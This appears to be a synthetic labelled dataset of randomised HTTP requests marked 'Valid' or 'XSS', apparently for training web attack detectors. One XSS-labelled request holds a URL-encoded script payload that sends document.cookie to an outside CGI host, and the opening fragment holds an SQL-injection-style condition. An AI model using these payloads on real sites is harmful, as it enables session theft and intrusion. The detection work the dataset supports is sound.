~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aorptim=ewi&fimatvhfwsjgl=>&oagaabiearb0ioa=009489&XJZopenJxSa=7098747781&laxi5speM=059&cmoaAnhue5tu= tdnokgr&tebh2bgbaldr=9&a2=17904&aztiseojc=561015828&moRsitaui83s=OR  'rStl'    BETWEEN   'R'    AND  'T'&.oNI=afwhfrYcemooehhNi&endhXhoiieesn=22998

End - Id: 35124
Start - Id: 576
class: Valid
GET /nJna7zees.mspx?tezEero=0thTetmca&flet=access_log&TwtmttthhesNI=eHcHm&orrn=t8dqiyYVan&xnncrnthnw=18Mnss&uhdTeibylpL=berIddwsmqe&rqopf=4820&AAvhGshtirrcclt=3spovs%3Ap%3BylGtiframehrad&kVhttpscoUIvcat.Cpassthru=5&.likeHqpB72=7etoU1d7q&honet3u=eunwp-iw&lsacNlitx=20474247&onutoh=eRejn&srtreEzae7Vwleu=6604696&fgtaw=yflhng5laarrmi HTTP/1.0
Host: 67.253.223.243:80
Connection: close
Accept: application/zip;q=0.5
Accept-Charset: iso-8859-8-i, x-mac-arabic, iso-8859-7;q=0.2
Accept-Encoding: gzip, deflate, identity, identity;q=0.1, identity;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 149.215.56.244
Cookie: Jce6anWbrf=yhmai sbdune9x:;H9eLyrTsi=3;lJO6rMjS8OrI=ei
Cookie2: $Version="3"
Date: Thu, 25 Jan 07 22:11:22 UTC
ETag: W/"ln37JRy0Pdvd44lMwj2"
Expect: 100-continue
From: i7wh@s1dUih1sA.it
If-Modified-Since: Thu, 19 Jan 06 16:58:34 CET
If-Unmodified-Since: Fri, 12 Jun 09 22:56:15 CET
If-Match: "0Vc8h.51mHMHMhlm-5j"
If-None-Match: "Im2bN5EGqp.IRyocyYf"
If-Range: Fri, 17 Nov 06 10:23:12 CET
Max-Forwards: 5
MIME-Version: 4.0
Pragma: 9osaeS=2u9RWgm
Proxy-Authorization: Digest uri=/enctRmn/arosaun.bin
Authorization: ooer arxl=7xVfetts
Range: -26
Referer: /nsaem/nhsVcr/sEu4sde/lDretlt/soidnpa.conf
TE: trailers
Trailer: Upgrade
User-Agent: s2btl6tOseqpt
UA-CPU: MIPS
UA-Disp: 233,014,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 412x961
Via: 0.3 www.egzeG.jpeg, 6.8 www.o6le.jpeg:838
Transfer-Encoding: gzip
Upgrade: geg/6.2
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 812808464
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 576
Start - Id: 22423
class: Valid
GET /xsanbdts/cf9Izxu8K6FWRD_4/dBxa4x6oU-oV/89iuzhvc5gOtLhtHeoix/rV@jiLsNYhzLb/e6icfrUAwacow.DwGf/oafatnten/iVSJ1-1RYyr@Je5fRt/aioAu2osiutbaBwe.js?0dhncethnawked=ar&rlfodllMnShbaed=69565&uiigni=h%5Clmeo%3Fywlbg&QF8AdPhtpass@OH0=taflt&spasyviDh=l&otClinz=3&IgT=ailtnMho&s9heylttonc=emDu8S&9wooOW=A8+p+ron%5De%27&sn=0600 HTTP/1.0
Host: www.eoynnyatie.biz:80
Connection: sro3s
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 7tra-alF8h, sfo-ma, i-mioyep5o, gRshsmoE-stiSshwh, 3bseti-3nmenamh
Cache-Control: no-store
Client-ip: 8.21.235.180
Cookie: Czy_U=m;eIad9nats0eas=cq-Vm6-uf1.K
Cookie2: $Version="02"
Date: Thu, 14 Aug 08 17:55:37 GMT
ETag: W/"6TvwSmuDLmRJ-V-EJ"
Expect: 100-continue
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Wed, 09 Mar 05 06:31:31 UTC
If-Unmodified-Since: Wed, 08 Jul 09 21:13:55 GMT
If-Match: *
If-None-Match: "pB5_7IDJOkAgdVd0EoY"
If-Range: Fri, 24 Nov 06 15:04:11 UTC
Max-Forwards: 6
MIME-Version: 5.6
Pragma: e8ucd9='t3toda'
Proxy-Authorization: Digest response="E92992fa2fC6dA4Ba96fFa2ECf05CF00"
Authorization: aioti hrspnaei=etr2tr
Range: 15-,-514
Referer: http://www.bh4etoa.org/kAE8eHn/nslthtpH/ehse0Ep/OoVr/qshbaz.mdb
TE: deflate,trailers
Trailer: Referer
User-Agent: aT2ga1z (eXrmhgb)
UA-CPU: x86
UA-Disp: 2687,163,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 112x1566
Via: HTTP/8.5 110.212.76.33:9, 4.5 138.38.95.68
Transfer-Encoding: er9a; izulheee=g8boe
Upgrade: said8/3.4, gNxedg/9.4
Warning: 736 www.eLwneah.shtml "l38ruhse" 
X-Forwarded-For: 112.96.205.75
X-Serial-Number: 935727491848892765
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 22423
Start - Id: 47604
class: XSS
GET /nJpR2maPYJT.css?Lz-idVB=passthrureplaceg&optSd=%3Cobject++classid+%3D+%22++++clsid%3A...+++++%22++++codebase+%3D+++%22++javascript%3A+%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.mang.com%2Fcgi-bin%2Ftielel.cgi%27%2Bdocument.cookie%29%3B%5D++++%22%3E&tracr=eseesldintceMdd&AsalloscmrqrdeM=4274&eos3ett=iuZ%258jt%3Aaeb HTTP/1.0
Host: www.ipaiEc.it:4033
Connection: close
Accept: */*
Accept-Charset: big5;q=0.5, x-mac-hebrew;q=0.2, macintosh;q=0.5, utf-7;q=0.2, cp-936
Accept-Encoding: 
Accept-Language: tugry-oeq;q=0.9, sd6tct-A
Cache-Control: no-cache
Client-ip: 179.141.108.140
Cookie: relawpaa=eic0
Cookie2: $Version="75"
Date: Sat, 20 Mar 04 12:51:13 CET
ETag: "nwTH@gkWC5HyBDgr7v"
Expect: pUonr4u1
From: qe6uc@3ooeC.uk
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 19 Jan 09 20:23:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6731
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 849916-
Referer: /wzt5elQ/mdrhr/agx8e.js
TE: trailers,deflate
Trailer: Trailer
User-Agent: 4ldo (57Rck0D; iV83fc; hox1Ic)
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: 0.3 www.Qtetnp6.css, 4.7 32.131.159.128, 82gd/5.2 122.59.42.154
Transfer-Encoding: compress
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 002 240.231.55.176:97 "DparR" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47604
Start - Id: 29276
class: Valid
GET /pemroagTv/olslssnwnd/i7dFecY5Ln_OvLtV/WOSsnetcatt/hy9sdcevlsp8/trUERobgaAk/4lBxT_@@MDjwb/dsfierq7ye1ims8atoh/iefeemsrvw1yo/dCw3varSJtstdin/re9eorlEalo8t.asmx? HTTP/1.0
Host: www.ihct.cz
Connection: keep-alive
Accept: application/rtf, audio/x-wav;q=0.2
Accept-Charset: x-mac-chinesesimp;q=0.2, iso-8859-3;q=0.5, iso-8859-7;q=0.2, iso-10646-ucs-2, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: deaf-yylb1;q=0.9, ts1ht-sfit;q=0.1, d-o4enOLeb
Cache-Control: only-if-cached
Client-ip: 49.75.184.213
Cookie: sehnl1u=3682
Cookie2: $Version="5"
Date: Tue, 16 Aug 05 19:55:41 CET
ETag: W/"iVt@Ct850nmIPgCs4"
Expect: toN3esaA
From: ioaIe7lb@6ltehaidqA.fr
If-Modified-Since: Sun, 03 Dec 06 16:57:50 CET
If-Unmodified-Since: Mon, 30 Mar 09 01:26:54 CET
If-Match: "j6ipnNCBR@cShMNBgvv"
If-None-Match: *
If-Range: Wed, 20 Feb 08 24:05:57 CET
Max-Forwards: 55
MIME-Version: 3.5
Pragma: 4=vj
Proxy-Authorization: Basic dHBlbE5mOnJjYkVlc0E=
Authorization: NTLM TXJ1YXNhS2NGb2NoOWFidGxwRHdtZlBOdHFlc3Q0NG9qZG52b2RLaHJzbQ==
Range: 222382-446,006519-77,90-10
Referer: http://www.v7nih7h.com/sanoOi6/mCssb/anOEuua/hoTUdUse/gsumttoe.exe
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 6.7; o8-as; rv:3.1.7) Gecko/27820956
UA-CPU: PowerPC
UA-Disp: 3130,4313,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: 3.1 www.tnrc.gif
Transfer-Encoding: gzip
Upgrade: ditie/9.0, nPnia/5.2, aqAcm/4.5, damts/1.4, aOnoe9/8.1
Warning: 783 107.227.6.97 "3ldiullnaotesre" 
X-Forwarded-For: 110.4.41.253
X-Serial-Number: 74768030946395
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29276
Start - Id: 6900
class: Valid
POST /dtn/kVzLQ/animsre8zBoa9bl/zsnoaos.mspx? HTTP/1.1
Content-Length: 69
Content-Language: re8a9,eOelol
Content-Encoding: deflate
Content-Location: /onihn/5hige.mpg
Content-MD5: b3RFNm1wbGhoYXFjZHRvYg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 May 05 15:03:46 GMT
Last-Modified: Wed, 09 Jul 08 24:22:41 UTC
Host: www.esazahnD.fr
Connection: d2kt
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.0
Accept-Language: tg-mnh;q=0.0, ck-wnndum, ef-awrho
Cache-Control: max-age=61
Client-ip: 186.90.60.129
Cookie: Cn=7;elLhhooSIesfeT=rri/@Ghrtbeeogrubsuh
Cookie2: $Version="809"
Date: Fri, 14 Jul 06 21:11:18 GMT
ETag: W/"U9CMk.nN5QWdPt_"
Expect: oroaKar=mEieN
From: heaiiaa@e0fsn.com
If-Modified-Since: Tue, 18 Dec 07 23:55:16 GMT
If-Unmodified-Since: Fri, 09 Apr 10 22:22:28 UTC
If-Match: "cfrovr8isy1aFnK8OR7"
If-None-Match: "ZvHJnoDxNR5sU42n"
If-Range: *
Max-Forwards: 9
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic dGd2WnZvMDpydGVy
Authorization: 5lphu qaaamex=3IRdden8
Range: 326-
Referer: http://p2ettna.uk/3vsd.jpg
TE: chunked;q=0.6,chunked,trailers
Trailer: If-Modified-Since
User-Agent: ketearat (qQ519ai)
UA-CPU: PowerPC
UA-Disp: 6111,6409,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 496x5279
Via: HTTP/7.6 www.hertijmo.jpeg
Transfer-Encoding: deflate
Upgrade: tjeto/0.4, 3ft/7.1
Warning: 788 www.HqrA8.jpeg "ttut7i" 
X-Forwarded-For: 230.81.180.144
X-Serial-Number: 65434343667649
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

zc8shY=4217&3httpsw8httpJegljB=aanetcat:hi &ipR3lpethscnon=eitauom4

End - Id: 6900
Start - Id: 20593
class: Valid
GET /aFfxt/h91tifaoe63ronn.php3?trsi1w=nateNihh&9anr9shpj=dsRKmNV1ZrnL&aiiineililH7=c3lGJO&eRcmrhhmscbG=im HTTP/1.0
Host: 230.241.160.230:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: identity, gzip, compress, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 208.232.197.213
Cookie: r2doZpXqd=nLojBpN.Kp;2vdbr=liet;o09z=nSetce
Cookie2: $Version="28"
Date: Sat, 07 Mar 09 09:03:02 UTC
ETag: "_JuxaDVkMU8e0Oym"
Expect: 100-continue
From: er9oa@3ehh.fr
If-Modified-Since: Fri, 02 Jun 06 02:55:00 GMT
If-Unmodified-Since: Sun, 05 Mar 06 11:27:40 CET
If-Match: "L65QcQ.983S@ObP0"
If-None-Match: "JELwF8hKBNoT0ND"
If-Range: "VDYOir7yw-HX0m0GQ"
Max-Forwards: 3480
MIME-Version: 6.7
Pragma: odr=jXtou
Proxy-Authorization: Digest nonce
Authorization: Digest nc=2bca92A6
Range: 8188-
Referer: /0t56/dRne/rmaha6.htm
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.8 (Windows; U; Windows NT 3.6; oE-ua; rv:6.4.1) Gecko/46062221
UA-CPU: StrongARM
UA-Disp: 265,2929,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1074x5578
Via: nl3ehu/5.1 www.hierrwhd.html
Transfer-Encoding: compress
Upgrade: 1bh2nl/0.8, aHt/2.8
Warning: 085 www.nNmehRA.gif "mrtsh7o" "Wed, 07 Feb 07 15:55:05 GMT"
X-Forwarded-For: 16.249.84.121
X-Serial-Number: 999844116491308
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20593
Start - Id: 8238
class: Valid
GET /a6bRM5w4iMxI/Tlhd3STk/ed2ek/wPd/uqcz_S.eFw0qng.bin?RIhz=bGbM&zatlrbiu5e=qJf&s3oNreSei=5awe&estaatepn3Rae1=aeidrtiaaaoiee96N&eNe=efR HTTP/1.0
Host: 169.51.188.52
Connection: keep-alive
Accept: application/rtf, application/*;q=0.1, text/*;q=0.9
Accept-Charset: iso-8859-8, iso-8859-9, windows-1252;q=0.1, iso-8859-2;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 245.120.27.245
Cookie: Bsvt64s=9218003;8trgi=a;ntdhaxdt=95
Cookie2: $Version="856"
Date: Sat, 16 Feb 08 03:46:44 UTC
ETag: "55@WDB@bKuDlow7@p"
Expect: 100-continue
From: seep8@iavee.it
If-Modified-Since: Fri, 13 Apr 07 13:37:44 CET
If-Unmodified-Since: Sat, 24 Sep 05 17:00:21 CET
If-Match: *
If-None-Match: *
If-Range: "5AwvaEO_sv1An62I"
Max-Forwards: 2161
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Basic ZWQ2M3Q6ZWlsYw==
Authorization: Digest username="srAieeal"
Range: 62861-,40-66
Referer: /oegle/Hzinoxso/6mxecoeC/cnx8o5v.mdb
TE: trailers,gzip,chunked
Trailer: Pragma
User-Agent: Mozilla/7.6 (Machintosh; U; Mac OS X 6.5; sl-wg; rv:2.9.8) Gecko/62161298
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8997x816
Via: HTTP/7.2 127.36.172.7, aHdsus/6.9 www.ey3r.shtml, 0.8 www.ueefhtnc.css
Transfer-Encoding: identity
Upgrade: ib6Ex/5.7, aZse/0.7
Warning: 350 www.rvsnz.jpg "iihmtwbmshrEsre" "Tue, 20 May 08 02:04:29 UTC"
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 9806136470509307613
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 8238
Start - Id: 16756
class: Valid
GET /IKS3hi7skJfromB/kntrhhourpfXbi/oz2_Arn/hB/iDJpp.tiff?med1euc=Xufl&neD=dlhgi&0dnA__Pselect=o&Ivpte26=5fys&arhiabtdsa5=5a&tzrt1efhDl=%27https4cwtdivsiTb&Cdinxet9Aat=r6kDPIT&ruaraneosne7nrn=%27jirsepe7hEconnect&cnwexr00ebj=bREEwWykE&abc39Hwiia52a9r=fd%241o+wxpe&a9sto1o1eoo5o=uoawhxets&9quSNbZ71Wr=%25trcpe&geOgeria=erlmqh HTTP/1.1
Host: www.ppktTadapl.biz
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.3, compress;q=0.3, gzip
Accept-Language: eo-2aEirO;q=0.5, lmEltt-lcbv, ribf6-eeeca, DisamwHa-s0o
Cache-Control: max-age=41073
Client-ip: 112.245.83.68
Cookie: eloo=selsca
Cookie2: $Version="44"
Date: Sat, 13 Feb 10 23:52:13 GMT
ETag: "FS76Z-2gSB5pCy8t"
Expect: 100-continue
From: 5bheroqe@o19bE.org
If-Modified-Since: Mon, 25 Aug 08 09:26:05 CET
If-Unmodified-Since: Thu, 08 Sep 05 05:50:35 UTC
If-Match: *
If-None-Match: "mhp5YOxTTVW6DZY"
If-Range: "EpKkg2abpy6_BlW"
Max-Forwards: 601
MIME-Version: 7.5
Pragma: l='iind'
Proxy-Authorization: NTLM YWF3ZUVudHVkc0JvaGVodHN5d2V5OHNhcm9iZWVzbGE=
Authorization: NTLM b2Fpb2kzOGFhbmVzYTJlcnhkZFN0M3A0Y2V1SGNOZGlkOWVldXhybDQ1VGZkY3N0
Range: 73855-,-7357
Referer: http://www.u8ahon.cz/ltobya/oey26/xciaoet.mp3
TE: deflate,chunked;q=0.6,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/7.5 (compatible; MSIE 8.5; Solaris; oetnd; bseiAilt; ul2yso3)
UA-CPU: StrongARM
UA-Disp: 9773,708,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 097x7373
Via: 9.7 www.nTxr.js, 7.1 www.ufeoac.css:58, 0.0 www.xgj7s.js
Transfer-Encoding: deflate
Upgrade: swAag/5.6, nah/5.1, ioe/9.2, 7nefA/6.4, iAt3h/4.0
Warning: 512 93.163.50.162 "gen9b" "Thu, 14 Oct 04 24:38:21 CET"
X-Forwarded-For: 125.30.59.190
X-Serial-Number: 2370554003999320
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16756
Start - Id: 7409
class: Valid
POST /a5L0w9x43oft7d2u8xE/tImtttebd1s/oTBQDqNLvX/ocr_d/bIhWK81_YiHkunaH/npplmcmheocolmte/6NckztWB7Bd/d8i00ulh/2FlwEy2Sb/aFrwU1VO1-PYZl6vI.php4? HTTP/1.0
Content-Length: 166
Content-Language: ogmt,aeado,dVs
Content-Encoding: compress
Content-Location: http://www.enyueMu.fr/9dehjhP.gif
Content-MD5: eW1haXc0c2Fmb1RsdGRrSA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 04 Mar 10 05:52:11 UTC
Last-Modified: Tue, 10 Mar 09 02:09:18 CET
Host: 219.69.69.129
Connection: close
Accept: application/*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: m-epaAiOl, 2imenn-0e;q=0.9, rhmiiba-b;q=0.6
Cache-Control: no-cache
Client-ip: 7.158.25.22
Cookie: loscn7dllbOxo=oF37K3-;srihoanvtQad=865979;et23e=tu-
Cookie2: $Version="25"
Date: Mon, 29 Jan 07 12:05:46 UTC
ETag: "cUwaUAFmfL@ZypbEOpvK"
Expect: 100-continue
From: lKiext@4bU5bHmi.st
If-Modified-Since: Tue, 29 Dec 09 12:24:46 UTC
If-Unmodified-Since: Sat, 10 Jan 09 15:20:34 CET
If-Match: *
If-None-Match: *
If-Range: "a.B-A7qI_yIlQKsxMm"
Max-Forwards: 6413
MIME-Version: 0.7
Pragma: dniahl='vk'
Proxy-Authorization: asue bpcdhTC=a83idrez
Authorization: Digest realm
Range: 12-25753
Referer: http://mntmln.net/4Wo8oim.wav
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.8 (Machintosh; U; PPC 5.3; dj-ef; rv:1.4.0) Gecko/67682941
UA-CPU: StrongARM
UA-Disp: 3035,3287,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9649x7067
Via: HTTP/3.8 www.9necd.html
Transfer-Encoding: gzip
Upgrade: arsv/7.3, gzM/6.6, neme/1.8, raLOwa/5.7
Warning: 382 www.s5iI.jpg "qhLcaYOza" "Tue, 01 Apr 08 22:47:56 UTC"
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 896535
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cV4hPa.N19=620290&FQstyleCwTK0link-4@=mottar9t|saslan&JOqF=o_GsIo&styb=sl@N99Hc8Qj&Cohhenftpw=OeIpassthruhdsnflaadelete&Rl7AzvrmqYeR=067&maaeeg=matg?tt)ndoarS

End - Id: 7409
Start - Id: 13385
class: Valid
GET /MAmpydocumentJQ1/YQ5i_kj/ateisematosr9ttetdt/fcqae/txXtaBprCTkFEN/t1EKgA2/cP6Vfexecv/9t@nz-Z2G2uL.cgi?fCjHJv=2&i0mobqtHghi0aat=8styleh HTTP/1.0
Host: www.tmsen0LV.org:176
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: ewaaOnd-e
Cache-Control: min-fresh=37
Client-ip: 88.65.120.166
Cookie: 0TkJJT-enY1s=2457185;htoenrgcs1Sv=642647961
Cookie2: $Version="49"
Date: Sat, 30 Jul 05 20:59:39 UTC
ETag: W/"YHWB-pSd1IKDDMSDMhX"
Expect: nsnth
From: tR8tllhl@cnlly.de
If-Modified-Since: Sun, 08 Feb 04 10:23:54 CET
If-Unmodified-Since: Sat, 22 Dec 07 12:46:39 GMT
If-Match: "POggiFuFLGKriQvWcGem"
If-None-Match: *
If-Range: *
Max-Forwards: 035
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cost eNin=l2ee4li
Authorization: Basic ZWVzbnZsZG46bmlsZA==
Range: 30-,-79267,97-361160
Referer: http://uaTreXrt.de/maNpeTc.htm
TE: chunked,gzip;q=0.2
Trailer: Connection
User-Agent: Mozilla/9.6 (X11; U; Open BSD i386 9.2; oe-95; rv:7.2.9) Gecko/68578355
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 968x9217
Via: FTP/6.6 198.172.176.73, 9.9 www.it6id.shtml:590, 1.5 www.0bs2qgc.css
Transfer-Encoding: identity
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 655 www.stNgKE7.png "aoa5fSu" 
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 0029155789665263
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13385
Start - Id: 4535
class: Valid
PUT /WUF2eH/tOhz.exe? HTTP/1.1
Content-Length: 290
Content-Language: tplri,stlds
Content-Encoding: gzip
Content-Location: /a8n8ksT/srcbuhau/artw.msf
Content-MD5: YXIzcmNqY3NkaGxzb2gycw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jul 07 24:07:35 CET
Last-Modified: Mon, 01 Mar 10 04:06:35 UTC
Host: www.acDrvgei6d.it
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-9;q=0.9, euc-tw;q=0.2, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 219.3.231.228
Cookie: iiat8Titdrvtea0=69;eeBokenv=0115022;.Rq3mDuOZJ@=wod
Cookie2: $Version="82"
Date: Sat, 15 Sep 07 12:14:16 GMT
ETag: "vyFDRBMmVeKdQPmYi"
Expect: 100-continue
From: ejuo@FxhthsevrC.org
If-Modified-Since: Mon, 09 Feb 09 19:57:07 UTC
If-Unmodified-Since: Sun, 17 Feb 08 11:48:35 CET
If-Match: *
If-None-Match: "VX-8yigJXL4KPD@N5"
If-Range: "IvTtkjsKYduHQfk_"
Max-Forwards: 4763
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: d6nso iofjtqph=imodlsXg
Authorization: Basic c2xyRDpPU3FkOGp0NQ==
Range: -574,-888
Referer: /nzuoamSl/eoee.rar
TE: chunked;q=0.4,chunked
Trailer: Host
User-Agent: rShevta1dcisudtlork
UA-CPU: 68000
UA-Disp: 487,8726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3467x636
Via: FTP/7.2 21.240.112.243, 0au6/1.1 140.26.99.118:45, HTTP/5.8 163.124.215.226:717
Transfer-Encoding: lhecp4
Upgrade: s7oa/5.1, Iarh/8.6, sneNut/1.8, r87p/8.4
Warning: 670 115.179.243.206 "5itohleeizatd" 
X-Forwarded-For: 165.72.96.126
X-Serial-Number: 1725557
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dlacceylogst=Eausothsr&jEdeLsg=51&y4=netcatA]r$ Tzut&ksabncanga3c=8193758&mKrisLc=47202&odpo3etjtCpl=49&pbi7=3542761&CDinsertxrDi=31&rIn1qbztst0hoph=tloo?thaou6betweenmhsAAb&5efNphpshutdown=tnxhaashtacces'zuRidrfr]a&hhleSehnepps=hRDxlzeF&stH9=23&wosyNel8frroin=bire9&o5ep7et=nE]

End - Id: 4535
Start - Id: 25066
class: Valid
GET /lEkQnUJkPR635nTC/lbaolerttnsc7/ddkATn_ro/78snOsvZvrk6rj6/ebaoiyse9koDcls4g/execF6L/oSlI/tgkSlJwRi@Bq9/85ZerplZxdlAdt_GHTO8/dEkEiiffbi/nXv.tiff? HTTP/1.1
Host: 43.114.130.159:80
Connection: keep-alive
Accept: application/*;q=0.2, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: o-Myi;q=0.4, ur3ylr-Pe;q=0.6, sPe-inherM;q=0.6
Cache-Control: no-cache
Client-ip: 173.205.99.105
Cookie: stPJftVe=yo
Cookie2: $Version="54"
Date: Tue, 03 Aug 04 03:15:24 UTC
ETag: "u248aUIf2HSJiI17"
Expect: rlnn2oH
From: sjwr3@deni.cz
If-Modified-Since: Wed, 28 Jul 04 05:08:04 GMT
If-Unmodified-Since: Thu, 29 May 08 23:15:23 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Jun 05 11:56:15 GMT
Max-Forwards: 9039
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM b3NqaXEydG9qaW13bGVlaWU2cWhpbWlyZGlMaTZ0Z2F0dw==
Authorization: gycmss i9ceesa=uDhgSi
Range: 5-57,-5993,408520-27607
Referer: /tfmstsAl/halgd/a4ocgcH/ah00i.cgi
TE: trailers,trailers,deflate;q=0.3
Trailer: TE
User-Agent: yereernmc (anBZrkI; c1vt0hbu)
UA-CPU: StrongARM
UA-Disp: 0466,0106,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6866x078
Via: FTP/3.5 www.prooc.jpg, FTP/6.3 www.27eghhz.htm, HTTP/8.1 195.96.210.28
Transfer-Encoding: deflate
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 069 254.171.0.195 "tteepahhCi0" 
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25066
Start - Id: 4357
class: Valid
POST /Dahopn0jaensua/oF9XwqjW.TJe/6R3q4RL/tnEtcK@2QZ92ro39x/aylkans5lecoet0/fwynn9/ekct.png? HTTP/1.1
Content-Length: 172
Content-Language: hsto,gdgErnnr
Content-Encoding: deflate
Content-Location: /sya0wtt/a8zga/nddgs/sC1n/7ooOni6.htm
Content-MD5: ZjJ1aW50Mm1ldGgxMjRiaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Mar 10 02:59:36 GMT
Last-Modified: Fri, 05 Jan 07 05:01:47 UTC
Host: 105.150.242.209
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-tw, gb2312;q=0.0
Accept-Encoding: gzip;q=0.6, compress, gzip, identity, compress;q=0.4
Accept-Language: etsd5Sc-a8a
Cache-Control: max-stale=4162
Client-ip: 153.252.139.251
Cookie: sttsxtli=n22ylirxSacceptc4>lc
Cookie2: $Version="281"
Date: Mon, 02 Jul 07 10:41:30 CET
ETag: W/"LNmZv3R-t@g81Cm"
Expect: cauh=hhir
From: oneEoqpN@Ie5atqZgN.cz
If-Modified-Since: Tue, 07 Apr 09 05:47:08 CET
If-Unmodified-Since: Sat, 18 Aug 07 06:35:23 GMT
If-Match: "OV46CF4MXpeo@Y8yI"
If-None-Match: *
If-Range: Fri, 06 Jul 07 03:55:32 CET
Max-Forwards: 4966
MIME-Version: 5.2
Pragma: rn9uANdp='ma5da'
Proxy-Authorization: NTLM c0lwempveTNuckI0bzBmTG85c3JyZThIb2V1bnF0bncxeXQ=
Authorization: Basic dWRyaW9ybjpzbFJyY290ZQ==
Range: 8-5728,5-967,67441-616423
Referer: /l1ok/5uldiom/sorrEow.asmx
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: nkrhEe4mLiurh7rdcmJi
UA-CPU: x86
UA-Disp: 187,8771,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1837x602
Via: 8.2 www.z9It.css, 7.2 111.208.57.149
Transfer-Encoding: deflate
Upgrade: toug/6.8, iuh7/1.8, gsei/6.7
Warning: 055 244.62.200.40:2 "0plu" 
X-Forwarded-For: 139.143.108.151
X-Serial-Number: 83365893402992
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

snniemolaoLy=2591&reoIOmntnh1==d[bgsound&hdntiorj1snic=979637&siu04attreott=py/tFmg2r&WwoZowgetrJF= h(af&trt2lls0denL=tspsttporv&node@sbX=509453&niinEo=ciebawaiyaoi

End - Id: 4357
Start - Id: 3656
class: Valid
